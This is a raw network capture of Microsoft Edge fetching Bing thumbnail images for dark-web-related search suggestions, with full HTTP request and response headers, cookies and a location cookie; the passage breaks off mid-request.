cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1949
x-check-cacheable: YES
cache-control: public, max-age=3755400
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e2
GET

https://th.bing.com/th?q=Dark+Web+Film&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Dark+Web+Film&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1769
x-check-cacheable: YES
cache-control: public, max-age=3058853
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e3
GET

https://th.bing.com/th?q=Scary+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Scary+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1454
x-check-cacheable: YES
cache-control: public, max-age=1233106
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e7
GET

https://th.bing.com/th?q=How+to+Access+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=How+to+Access+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2280
x-check-cacheable: YES
cache-control: public, max-age=2267025
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e9
GET

https://th.bing.com/th?q=Browse+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Browse+Dark+Web&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1921
x-check-cacheable: YES
cache-control: public, max-age=2380600
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f0
GET

https://th.bing.com/th?id=ODLS.187c0f58-21cd-40a8-a334-6342e9abce82&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.187c0f58-21cd-40a8-a334-6342e9abce82&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 804
cache-control: public, max-age=942555
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f5
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.RFwzjeXVn3MsUAAuJVujZAHaEa&w=80&h=80&c=1&vt=10&bgcl=be7602&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.RFwzjeXVn3MsUAAuJVujZAHaEa&w=80&h=80&c=1&vt=10&bgcl=be7602&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
